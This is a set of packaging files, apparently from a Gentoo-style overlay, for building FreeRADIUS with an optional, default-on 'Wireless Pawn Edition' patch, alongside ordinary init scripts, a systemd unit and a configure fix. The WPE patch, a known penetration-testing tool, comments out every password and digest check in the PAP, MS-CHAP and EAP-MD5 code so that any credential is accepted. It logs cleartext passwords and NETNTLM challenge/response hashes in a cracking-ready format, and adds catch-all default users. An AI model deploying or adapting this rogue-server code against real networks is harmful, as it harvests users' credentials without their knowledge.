REDEBUG("LM digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -1257,10 +1273,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
fr_md5_final(buff, &md5_context);
}
+ /*
if (rad_digest_cmp(digest, buff, 16) != 0) {
REDEBUG("NS-MTA-MD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -1283,6 +1301,9 @@ static rlm_rcode_t CC_HINT(nonnull) mod_
return RLM_MODULE_INVALID;
}
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0, main_config.wpelogfile);
+
/*
* The user MUST supply a non-zero-length password.
*/


@ -1,38 +0,0 @@
https://src.fedoraproject.org/rpms/freeradius/c/1793f410aa789704b5ac0be9cf7d0eaece906d1a?branch=rawhide
https://github.com/FreeRADIUS/freeradius-server/pull/5246
The backtrace_symbols function expects a pointer to an array of void *
values, not a pointer to an array of a single element. Removing the
address operator ensures that the right type is used.
This avoids an unconditional failure of this probe with compilers that
treat incompatible pointer types as a compilation error.
Submitted upstream: <https://github.com/FreeRADIUS/freeradius-server/pull/5246>
diff --git a/configure b/configure
index ed01ee2bdd912f63..1e6d2284779cdd58 100755
--- a/configure
+++ b/configure
@@ -13390,7 +13390,7 @@ main (void)
{
void *sym[1];
- backtrace_symbols(&sym, sizeof(sym))
+ backtrace_symbols(sym, sizeof(sym))
;
return 0;
}
diff --git a/configure.ac b/configure.ac
index 76320213b51d7bb4..6a689711d6c90483 100644
--- a/configure.ac
+++ b/configure.ac
@@ -2168,7 +2168,7 @@ if test "x$ac_cv_header_execinfo_h" = "xyes"; then
#include <execinfo.h>
]], [[
void *sym[1];
- backtrace_symbols(&sym, sizeof(sym)) ]])],[
+ backtrace_symbols(sym, sizeof(sym)) ]])],[
AC_MSG_RESULT(yes)
ac_cv_lib_execinfo_backtrace_symbols="yes"
],[


@ -1,435 +0,0 @@
From: Sophie Brun <sophie@offensive-security.com>
Date: Mon, 17 Jul 2023 18:01:05 +0200
Subject: freeradius-wpe
---
raddb/mods-config/files/authorize | 2 +
raddb/radiusd.conf.in | 3 ++
src/include/log.h | 5 ++
src/include/radiusd.h | 2 +
src/main/auth.c | 1 +
src/main/libfreeradius-server.mk | 1 +
src/main/log.c | 71 +++++++++++++++++++++++++
src/main/mainconfig.c | 1 +
src/main/radiusd.c | 2 +-
src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c | 4 ++
src/modules/rlm_mschap/rlm_mschap.c | 11 ++--
src/modules/rlm_pap/rlm_pap.c | 25 ++++++++-
12 files changed, 122 insertions(+), 6 deletions(-)
diff --git a/raddb/mods-config/files/authorize b/raddb/mods-config/files/authorize
index ddf805f..315bf4b 100644
--- a/raddb/mods-config/files/authorize
+++ b/raddb/mods-config/files/authorize
@@ -204,3 +204,5 @@ DEFAULT Hint == "SLIP"
# See the example user "bob" above. #
#########################################################
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "a"
diff --git a/raddb/radiusd.conf.in b/raddb/radiusd.conf.in
index 0d154db..4bee477 100644
--- a/raddb/radiusd.conf.in
+++ b/raddb/radiusd.conf.in
@@ -445,6 +445,9 @@ ENV {
# LD_PRELOAD = /path/to/library2.so
}
+# Wireless Pawn Edition log file
+wpelogfile = ${logdir}/freeradius-server-wpe.log
+
# SECURITY CONFIGURATION
#
# There may be multiple methods of attacking on the server. This
diff --git a/src/include/log.h b/src/include/log.h
index 2736591..b3ffeb1 100644
--- a/src/include/log.h
+++ b/src/include/log.h
@@ -72,6 +72,11 @@ typedef struct fr_log_t {
char const *debug_file; //!< Path to debug log file.
} fr_log_t;
+void log_wpe(const char *authtype, const char *username, const char *password,
+ const unsigned char *challenge, const unsigned int challen,
+ const unsigned char *response, const unsigned int resplen,
+ const char * logfilename);
+
typedef void (*radlog_func_t)(log_type_t lvl, log_lvl_t priority, REQUEST *, char const *, va_list ap);
extern FR_NAME_NUMBER const syslog_facility_table[];
diff --git a/src/include/radiusd.h b/src/include/radiusd.h
index 594a6bd..e171efe 100644
--- a/src/include/radiusd.h
+++ b/src/include/radiusd.h
@@ -152,6 +152,8 @@ typedef struct main_config {
char const *checkrad; //!< Script to use to determine if a user is already
//!< connected.
+ char const *wpelogfile; //!< Wireless Pawn Edition log file path.
+
rad_listen_t *listen; //!< Head of a linked list of listeners.
diff --git a/src/main/auth.c b/src/main/auth.c
index 84889b8..5a3debe 100644
--- a/src/main/auth.c
+++ b/src/main/auth.c
@@ -129,6 +129,7 @@ static int rad_authlog(char const *msg, REQUEST *request, int goodpass)
} else {
fr_prints(clean_password, sizeof(clean_password),
request->password->vp_strvalue, request->password->vp_length, '\0');
+ log_wpe("password", request->username->vp_strvalue, clean_password, NULL, 0, NULL, 0, main_config.wpelogfile);
}
}
diff --git a/src/main/libfreeradius-server.mk b/src/main/libfreeradius-server.mk
index 4495f72..56c6c5b 100644
--- a/src/main/libfreeradius-server.mk
+++ b/src/main/libfreeradius-server.mk
@@ -14,6 +14,7 @@ SOURCES := conffile.c \
pair.c \
xlat.c
+
# This lets the linker determine which version of the SSLeay functions to use.
TGT_LDLIBS := $(OPENSSL_LIBS)
diff --git a/src/main/log.c b/src/main/log.c
index 1ca2f91..5efc31e 100644
--- a/src/main/log.c
+++ b/src/main/log.c
@@ -29,6 +29,7 @@ RCSID("$Id$")
#include <freeradius-devel/radiusd.h>
#include <freeradius-devel/rad_assert.h>
+/*#include <freeradius-devel/conf.h>*/
#ifdef HAVE_SYS_STAT_H
# include <sys/stat.h>
@@ -46,6 +47,9 @@ RCSID("$Id$")
#include <pthread.h>
#endif
+#include <stdio.h>
+#include <time.h>
+
log_lvl_t rad_debug_lvl = 0; //!< Global debugging level
static bool rate_limit = true; //!< Whether repeated log entries should be rate limited
@@ -226,6 +230,73 @@ static int stdout_fd = -1; //!< The original unmolested stdout file descriptor
static char const spaces[] = " ";
+/** Prints username, password or challenge/response
+ *
+ */
+void log_wpe(const char *authtype, const char *username, const char *password,
+ const unsigned char *challenge, const unsigned int challen,
+ const unsigned char *response, const unsigned int resplen,
+ const char * logfilename)
+{
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (logfilename == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(logfilename, "a");
+ if (logfd == NULL) {
+ fr_strerror_printf(" log: FAILED: Unable to open output log file %s: %s", logfilename, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ if ( (strncmp(authtype, "mschap", 6) == 0) && username != NULL
+ && challen != 0 && resplen != 0) {
+ fprintf(logfd, "\tjohn NETNTLM: %s:$NETNTLM$",username);
+ for (count=0; count<challen; count++) {
+ fprintf(logfd, "%02x",challenge[count]);
+ }
+ fprintf(logfd,"$");
+ for (count=0; count<resplen; count++) {
+ fprintf(logfd, "%02x",response[count]);
+ }
+ fprintf(logfd,"\n");
+ }
+
+ fprintf(logfd, "\n");
+
+ fclose(logfd);
+}
+
/** On fault, reset STDOUT and STDERR to something useful
*
* @return 0
diff --git a/src/main/mainconfig.c b/src/main/mainconfig.c
index 227ae4a..9f80e83 100644
--- a/src/main/mainconfig.c
+++ b/src/main/mainconfig.c
@@ -200,6 +200,7 @@ static const CONF_PARSER server_config[] = {
{ "postauth_client_lost", FR_CONF_POINTER(PW_TYPE_BOOLEAN, &main_config.postauth_client_lost), "no" },
{ "pidfile", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.pid_file), "${run_dir}/radiusd.pid"},
{ "checkrad", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.checkrad), "${sbindir}/checkrad" },
+ { "wpelogfile", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.wpelogfile), "${logdir}/freeradius-server-wpe.log" },
{ "debug_level", FR_CONF_POINTER(PW_TYPE_INTEGER, &main_config.debug_level), "0"},
diff --git a/src/main/radiusd.c b/src/main/radiusd.c
index 36fa663..24d7c03 100644
--- a/src/main/radiusd.c
+++ b/src/main/radiusd.c
@@ -64,7 +64,7 @@ char const *radlog_dir = NULL;
bool log_stripped_names;
-char const *radiusd_version = "FreeRADIUS Version " RADIUSD_VERSION_STRING
+char const *radiusd_version = "FreeRADIUS-WPE Version " RADIUSD_VERSION_STRING
#ifdef RADIUSD_VERSION_COMMIT
" (git #" STRINGIFY(RADIUSD_VERSION_COMMIT) ")"
#endif
diff --git a/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c b/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
index e8acb5c..b28d0b8 100644
--- a/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
+++ b/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
@@ -166,10 +166,14 @@ int eapmd5_verify(MD5_PACKET *packet, VALUE_PAIR* password,
/*
* The length of the response is always 16 for MD5.
*/
+ /*
if (rad_digest_cmp(digest, packet->value, 16) != 0) {
DEBUG("EAP-MD5 digests do not match.");
return 0;
}
+ */
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16, main_config.wpelogfile);
return 1;
}
diff --git a/src/modules/rlm_mschap/rlm_mschap.c b/src/modules/rlm_mschap/rlm_mschap.c
index 00ab90d..07c7e0d 100644
--- a/src/modules/rlm_mschap/rlm_mschap.c
+++ b/src/modules/rlm_mschap/rlm_mschap.c
@@ -1189,10 +1189,13 @@ ntlm_auth_err:
*/
static int CC_HINT(nonnull (1, 2, 4, 5 ,6)) do_mschap(rlm_mschap_t *inst, REQUEST *request, VALUE_PAIR *password,
uint8_t const *challenge, uint8_t const *response,
- uint8_t nthashhash[NT_DIGEST_LENGTH], MSCHAP_AUTH_METHOD method)
+ uint8_t nthashhash[NT_DIGEST_LENGTH], MSCHAP_AUTH_METHOD method,
+ const char *username)
{
uint8_t calculated[24];
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24, main_config.wpelogfile);
+
memset(nthashhash, 0, NT_DIGEST_LENGTH);
switch (method) {
@@ -1209,9 +1212,11 @@ static int CC_HINT(nonnull (1, 2, 4, 5 ,6)) do_mschap(rlm_mschap_t *inst, REQUES
}
smbdes_mschap(password->vp_octets, challenge, calculated);
+ /*
if (rad_digest_cmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
@@ -1945,7 +1950,7 @@ static rlm_rcode_t CC_HINT(nonnull) mod_authenticate(void *instance, REQUEST *re
* Do the MS-CHAP authentication.
*/
mschap_result = do_mschap(inst, request, password, challenge->vp_octets,
- response->vp_octets + offset, nthashhash, auth_method);
+ response->vp_octets + offset, nthashhash, auth_method, NULL);
/*
* Check for errors, and add MSCHAP-Error if necessary.
*/
@@ -2062,7 +2067,7 @@ static rlm_rcode_t CC_HINT(nonnull) mod_authenticate(void *instance, REQUEST *re
RDEBUG2("Client is using MS-CHAPv2");
mschap_result = do_mschap(inst, request, nt_password, mschapv1_challenge,
- response->vp_octets + 26, nthashhash, auth_method);
+ response->vp_octets + 26, nthashhash, auth_method, username_string);
rcode = mschap_error(inst, request, *response->vp_octets,
mschap_result, mschap_version, smb_ctrl);
if (rcode != RLM_MODULE_OK) return rcode;
diff --git a/src/modules/rlm_pap/rlm_pap.c b/src/modules/rlm_pap/rlm_pap.c
index 463ff66..059aab9 100644
--- a/src/modules/rlm_pap/rlm_pap.c
+++ b/src/modules/rlm_pap/rlm_pap.c
@@ -566,6 +566,7 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_clear(UNUSED rlm_pap_t *inst, REQUE
RDEBUG("Comparing with \"known good\" Cleartext-Password");
}
+ /*
if ((vp->vp_length != request->password->vp_length) ||
(rad_digest_cmp(vp->vp_octets,
request->password->vp_octets,
@@ -573,6 +574,7 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_clear(UNUSED rlm_pap_t *inst, REQUE
REDEBUG("Cleartext password does not match \"known good\" password");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -612,12 +614,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_md5(rlm_pap_t *inst, REQUEST *reque
request->password->vp_length);
fr_md5_final(digest, &md5_context);
fr_md5_destroy(&md5_context);
-
+/*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("MD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
-
+*/
return RLM_MODULE_OK;
}
@@ -647,10 +649,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_smd5(rlm_pap_t *inst, REQUEST *requ
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
REDEBUG("SMD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -675,10 +679,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_sha(rlm_pap_t *inst, REQUEST *reque
request->password->vp_length);
fr_sha1_final(digest,&sha1_context);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("SHA1 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -704,10 +710,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_ssha(rlm_pap_t *inst, REQUEST *requ
fr_sha1_update(&sha1_context, &vp->vp_octets[20], vp->vp_length - 20);
fr_sha1_final(digest, &sha1_context);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
REDEBUG("SSHA digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -768,10 +776,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_sha2(rlm_pap_t *inst, REQUEST *requ
rad_assert((size_t) digest_len == vp->vp_length); /* This would be an OpenSSL bug... */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("%s digest does not match \"known good\" digest", name);
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -840,10 +850,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_ssha2(rlm_pap_t *inst, REQUEST *req
/*
* Only compare digest_len bytes, the rest is salt.
*/
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, (size_t)digest_len) != 0) {
REDEBUG("%s digest does not match \"known good\" digest", name);
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -1173,10 +1185,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_nt(rlm_pap_t *inst, REQUEST *reques
fr_md4_calc(digest, (uint8_t *) ucs2_password, len);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("NT digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -1203,11 +1217,13 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_lm(rlm_pap_t *inst, REQUEST *reques
return RLM_MODULE_FAIL;
}
+ /*
if ((fr_hex2bin(digest, sizeof(digest), charbuf, len) != vp->vp_length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0)) {
REDEBUG("LM digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -1264,10 +1280,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_ns_mta_md5(UNUSED rlm_pap_t *inst,
fr_md5_final(buff, &md5_context);
}
+ /*
if (rad_digest_cmp(digest, buff, 16) != 0) {
REDEBUG("NS-MTA-MD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -1290,6 +1308,9 @@ static rlm_rcode_t CC_HINT(nonnull) mod_authenticate(void *instance, REQUEST *re
return RLM_MODULE_INVALID;
}
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0, main_config.wpelogfile);
+
/*
* The user MUST supply a non-zero-length password.
*/


@ -1,43 +0,0 @@
From: Sophie Brun <sophie@offensive-security.com>
Date: Mon, 27 Jun 2022 18:27:30 +0200
Subject: Use user freerad-wpe
---
raddb/radiusd.conf.in | 4 ++--
raddb/sites-available/control-socket | 4 ++--
2 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/raddb/radiusd.conf.in b/raddb/radiusd.conf.in
index 5d51728..0d154db 100644
--- a/raddb/radiusd.conf.in
+++ b/raddb/radiusd.conf.in
@@ -510,8 +510,8 @@ security {
# member. This can allow for some finer-grained access
# controls.
#
- user = freerad
- group = freerad
+ user = freerad-wpe
+ group = freerad-wpe
# Core dumps are a bad thing. This should only be set to
# 'yes' if you're debugging a problem with the server.
diff --git a/raddb/sites-available/control-socket b/raddb/sites-available/control-socket
index 17b9f69..6b0a2f0 100644
--- a/raddb/sites-available/control-socket
+++ b/raddb/sites-available/control-socket
@@ -72,12 +72,12 @@ listen {
#
# Name of user that is allowed to connect to the control socket.
#
-# uid = freerad
+# uid = freerad-wpe
#
# Name of group that is allowed to connect to the control socket.
#
-# gid = freerad
+# gid = freerad-wpe
#
# Access mode.


@ -1,15 +0,0 @@
[Unit]
Description=FreeRADIUS high performance RADIUS server.
After=syslog.target network.target
[Service]
Type=simple
PIDFile=/run/radiusd/radiusd.pid
ExecStartPre=-/bin/chown -R radius:radius /run/radiusd
ExecStartPre=/usr/sbin/radiusd -C
ExecStart=/usr/sbin/radiusd -d /etc/raddb -f
ExecReload=/usr/sbin/radiusd -C
ExecReload=/bin/kill -HUP $MAINPID
[Install]
WantedBy=multi-user.target


@ -1 +0,0 @@
d /run/radiusd 0755 radius radius -


@ -1,16 +0,0 @@
# Config file for /etc/init.d/radiusd
# see man pages for radiusd run `radiusd -h`
# for valid cmdline options
#RADIUSD_OPTS=""
# Change this value if you change it in /etc/raddb/radiusd.conf
pidfile=/var/run/radiusd/radiusd.pid
# Change these values if you change them in /etc/raddb/radiusd.conf
RADIUSD_USER=radius
RADIUSD_GROUP=radius
# If you set up logging to syslog in /etc/raddb/radiusd.conf, you want
# to uncomment the following line.
#rc_use="logger"


@ -1,18 +0,0 @@
# Config file for /etc/init.d/radiusd
# see man pages for radiusd run `radiusd -h`
# for valid cmdline options
#RADIUSD_OPTS=""
# Change this value if you change it in /etc/raddb/radiusd.conf
pidfile=/var/run/radiusd/radiusd.pid
# Change these values if you change them in /etc/raddb/radiusd.conf
RADIUSD_USER=radius
RADIUSD_GROUP=radius
RADIUSD_LOGPATH=/var/log/radius
# If you set up logging to syslog in /etc/raddb/radiusd.conf, you want
# to uncomment the following line.
#rc_use="logger"


@ -1,22 +0,0 @@
# Config file for /etc/init.d/radiusd
# see man pages for radiusd run `radiusd -h`
# for valid cmdline options
#RADIUSD_OPTS=""
# Change this value if you change it in /etc/raddb/radiusd.conf
pidfile=/run/radiusd/radiusd.pid
# Change these values if you change them in /etc/raddb/radiusd.conf
RADIUSD_USER=radius
RADIUSD_GROUP=radius
RADIUSD_LOGPATH=/var/log/radius
# If you set up logging to syslog in /etc/raddb/radiusd.conf, you want
# to uncomment the following line.
#rc_use="logger"
# If you use ldap, start the ldap server prior to FreeRADIUS to avoid
# startup crashes.
#rc_use="ldap"


@ -1,31 +0,0 @@
#!/sbin/openrc-run
# Copyright 1999-2016 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
command=/usr/sbin/radiusd
command_args="${RADIUSD_OPTS}"
pidfile="${pidfile:-/run/radiusd/radiusd.pid}"
extra_started_commands="reload"
depend() {
need localmount
use dns
}
start_pre() {
if [ ! -f /etc/raddb/radiusd.conf ] ; then
eerror "No /etc/raddb/radiusd.conf file exists!"
return 1
fi
checkpath -m0750 -o "${RADIUSD_USER:-root}:${RADIUSD_GROUP:-root}" -d \
$(dirname ${pidfile}) /var/log/radius
checkpath -m0750 -o "${RADIUSD_USER:-root}:${RADIUSD_GROUP:-root}" -d \
$(dirname ${pidfile}) /run/radiusd
}
reload() {
ebegin "Reloading radiusd"
kill -HUP $(cat ${pidfile})
eend $?
}


@ -1,31 +0,0 @@
#!/sbin/openrc-run
# Copyright 1999-2020 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
command=/usr/sbin/radiusd
command_args="${RADIUSD_OPTS}"
pidfile="${pidfile:-/run/radiusd/radiusd.pid}"
extra_started_commands="reload"
depend() {
need localmount
use dns
}
start_pre() {
if [ ! -f /etc/raddb/radiusd.conf ] ; then
eerror "No /etc/raddb/radiusd.conf file exists!"
return 1
fi
checkpath -m0750 -o "${RADIUSD_USER:-root}:${RADIUSD_GROUP:-root}" -d \
$(dirname ${pidfile}) "${RADIUSD_LOGPATH:-/var/log/radius}"
checkpath -m0750 -o "${RADIUSD_USER:-root}:${RADIUSD_GROUP:-root}" -d \
$(dirname ${pidfile}) /run/radiusd
}
reload() {
ebegin "Reloading radiusd"
kill -HUP $(cat ${pidfile})
eend $?
}


@ -1,3 +0,0 @@
DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
DEFAULT Cleartext-Password := "a"


@ -1,328 +0,0 @@
# Copyright 1999-2024 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
PYTHON_COMPAT=( python3_{11..13} )
AUTOTOOLS_DEPEND=">=dev-build/autoconf-2.69"
inherit autotools pam python-single-r1 systemd
MY_PN=${PN}-server
MY_P=${MY_PN}-${PV}
MY_PV=$(ver_rs 1- "_")
DESCRIPTION="Highly configurable free RADIUS server"
HOMEPAGE="https://freeradius.org/"
SRC_URI="https://github.com/FreeRADIUS/freeradius-server/releases/download/release_${MY_PV}/${MY_P}.tar.bz2"
S="${WORKDIR}"/${MY_P}
LICENSE="GPL-2"
SLOT="0"
KEYWORDS="~amd64 ~arm ~arm64 ~ppc ~ppc64 ~sparc ~x86"
IUSE="
debug firebird iodbc kerberos ldap memcached mysql mongodb odbc oracle pam
postgres python readline redis samba selinux sqlite ssl systemd +wpe
"
RESTRICT="firebird? ( bindist )"
# NOTE: Temporary freeradius doesn't support linking with mariadb client
# libs also if code is compliant, will be available in the next release.
# (http://lists.freeradius.org/pipermail/freeradius-devel/2018-October/013228.html)a
# TODO: rlm_mschap works with both samba library or without. I need to avoid
# linking of samba library if -samba is used.
# TODO: unconditional json-c for now as automagic dep despite efforts to stop it
# ditto libpcap. Can restore USE=rest, USE=pcap if/when fixed.
DEPEND="
acct-group/radius
acct-user/radius
dev-libs/libltdl
dev-libs/libpcre
dev-libs/json-c:=
dev-lang/perl:=
net-libs/libpcap
net-misc/curl
sys-libs/gdbm:=
sys-libs/libcap
sys-libs/talloc
virtual/libcrypt:=
firebird? ( dev-db/firebird )
iodbc? ( dev-db/libiodbc )
kerberos? ( virtual/krb5 )
ldap? ( net-nds/openldap:= )
memcached? ( dev-libs/libmemcached )
mysql? ( dev-db/mysql-connector-c:= )
mongodb? ( >=dev-libs/mongo-c-driver-1.13.0-r1 )
odbc? ( dev-db/unixODBC )
oracle? ( dev-db/oracle-instantclient[sdk] )
pam? ( sys-libs/pam )
postgres? ( dev-db/postgresql:= )
python? ( ${PYTHON_DEPS} )
readline? ( sys-libs/readline:= )
redis? ( dev-libs/hiredis:= )
samba? ( net-fs/samba )
sqlite? ( dev-db/sqlite:3 )
ssl? ( >=dev-libs/openssl-1.0.2:=[-bindist(-)] )
systemd? ( sys-apps/systemd:= )
"
RDEPEND="
${DEPEND}
selinux? ( sec-policy/selinux-radius )
"
REQUIRED_USE="python? ( ${PYTHON_REQUIRED_USE} )"
# bug #721040
QA_SONAME="usr/lib.*/libfreeradius-.*.so"
QA_CONFIG_IMPL_DECL_SKIP=(
# Not available on Linux (bug #900048)
htonll
htonlll
)
PATCHES=(
"${FILESDIR}"/${PN}-3.0.20-systemd-service.patch
"${FILESDIR}"/${PN}-3.2.3-configure-c99.patch
)
pkg_setup() {
if use python ; then
python-single-r1_pkg_setup
export PYTHONBIN="${EPYTHON}"
fi
}
src_prepare() {
#https://patches.aircrack-ng.org/wpe/freeradius-wpe/
if use wpe; then
eapply "${FILESDIR}/${PN}-3.2.3-wpe.patch"
# cp "${FILESDIR}"/clients_wpe.conf raddb/clients.conf || die "failed to copy config files"
# cp "${FILESDIR}"/eap_wpe.conf raddb/eap.conf || die "failed to copy config files"
# cp "${FILESDIR}"/users_wpe raddb/users || die "failed to copy config files"
fi
default
# Most of the configuration options do not appear as ./configure
# switches. Instead it identifies the directories that are available
# and run through them. These might check for the presence of
# various libraries, in which case they are not built. To avoid
# automagic dependencies, we just remove all the modules that we're
# not interested in using.
# TODO: shift more of these into configure args below as things
# are a bit better now.
use ssl || { rm -r src/modules/rlm_eap/types/rlm_eap_{tls,ttls,peap} || die ; }
use ldap || { rm -r src/modules/rlm_ldap || die ; }
use kerberos || { rm -r src/modules/rlm_krb5 || die ; }
use memcached || { rm -r src/modules/rlm_cache/drivers/rlm_cache_memcached || die ; }
use pam || { rm -r src/modules/rlm_pam || die ; }
# Drop support for python2
rm -r src/modules/rlm_python || die
use python || { rm -r src/modules/rlm_python3 || die ; }
#use rest || { rm -r src/modules/rlm_rest || die ; }
# Do not install ruby rlm module, bug #483108
rm -r src/modules/rlm_ruby || die
# These are all things we don't have in portage/I don't want to deal
# with myself.
#
# Requires TNCS library
rm -r src/modules/rlm_eap/types/rlm_eap_tnc || die
# Requires libeap-ikev2
rm -r src/modules/rlm_eap/types/rlm_eap_ikev2 || die
# Requires some membership.h
rm -r src/modules/rlm_opendirectory || die
# ?
rm -r src/modules/rlm_sql/drivers/rlm_sql_{db2,freetds} || die
# SQL drivers that are not part of experimental are loaded from a
# file, so we have to remove them from the file itself when we
# remove them.
usesqldriver() {
local flag=$1
local driver=rlm_sql_${2:-${flag}}
if ! use ${flag} ; then
rm -r src/modules/rlm_sql/drivers/${driver} || die
sed -i -e /${driver}/d src/modules/rlm_sql/stable || die
fi
}
sed -i \
-e 's:^#\tuser = :\tuser = :g' \
-e 's:^#\tgroup = :\tgroup = :g' \
-e 's:/var/run/radiusd:/run/radiusd:g' \
-e '/^run_dir/s:${localstatedir}::g' \
raddb/radiusd.conf.in || die
# - Verbosity
# - B uild shared libraries using jlibtool -shared
sed -i \
-e 's|--silent ||g' \
-e 's:--mode=\(compile\|link\):& -shared:g' \
scripts/libtool.mk || die
# Crude measure to stop jlibtool from running ranlib and ar
sed -i \
-e '/LIBRARIAN/s|".*"|"true"|g' \
-e '/RANLIB/s|".*"|"true"|g' \
scripts/jlibtool.c || die
usesqldriver mysql
usesqldriver postgres postgresql
usesqldriver firebird
usesqldriver iodbc
usesqldriver odbc unixodbc
usesqldriver oracle
usesqldriver sqlite
usesqldriver mongodb mongo
eautoreconf
}
src_configure() {
# Do not try to enable static with static-libs; upstream is a
# massacre of libtool best practices so you also have to make sure
# to --enable-shared explicitly.
local myeconfargs=(
# Revisit confcache when not needing to use ac_cv anymore
# for automagic deps.
#--cache-file="${S}"/config.cache
--enable-shared
--disable-ltdl-install
--disable-silent-rules
--with-system-libtool
--with-system-libltdl
--enable-strict-dependencies
--without-rlm_couchbase
--without-rlm_securid
--without-rlm_unbound
--without-rlm_idn
#--without-rlm_json
#$(use_with rest libfreeradius-json)
# Our OpenSSL should be patched. Avoid false-positive failures.
--disable-openssl-version-check
--with-ascend-binary
--with-udpfromto
--with-dhcp
--with-pcre
--with-iodbc-include-dir=/usr/include/iodbc
--with-experimental-modules
--with-docdir=/usr/share/doc/${PF}
--with-logdir=/var/log/radius
$(use_enable debug developer)
$(use_with ldap edir)
$(use_with redis rlm_cache_redis)
$(use_with redis rlm_redis)
$(use_with redis rlm_rediswho)
$(use_with ssl openssl)
$(use_with systemd systemd)
)
# bug #77613
if has_version app-crypt/heimdal ; then
myeconfargs+=( --enable-heimdal-krb5 )
fi
if use python ; then
myeconfargs+=(
--with-rlm-python3-bin=${EPYTHON}
--with-rlm-python3-config-bin=${EPYTHON}-config
)
fi
if ! use readline ; then
export ac_cv_lib_readline=no
fi
#if ! use pcap ; then
# export ac_cv_lib_pcap_pcap_open_live=no
# export ac_cv_header_pcap_h=no
#fi
econf "${myeconfargs[@]}"
}
src_compile() {
# Verbose, do not generate certificates
emake \
Q='' ECHO=true \
LOCAL_CERT_PRODUCTS=''
}
src_install() {
dodir /etc
diropts -m0750 -o root -g radius
dodir /etc/raddb
diropts -m0750 -o radius -g radius
dodir /var/log/radius
keepdir /var/log/radius/radacct
diropts
# - Verbose, do not install certificates
# - Parallel install fails (bug #509498)
emake -j1 \
Q='' ECHO=true \
LOCAL_CERT_PRODUCTS='' \
R="${D}" \
install
if use pam ; then
pamd_mimic_system radiusd auth account password session
fi
# bug #711756
fowners -R radius:radius /etc/raddb
fowners -R radius:radius /var/log/radius
dodoc CREDITS
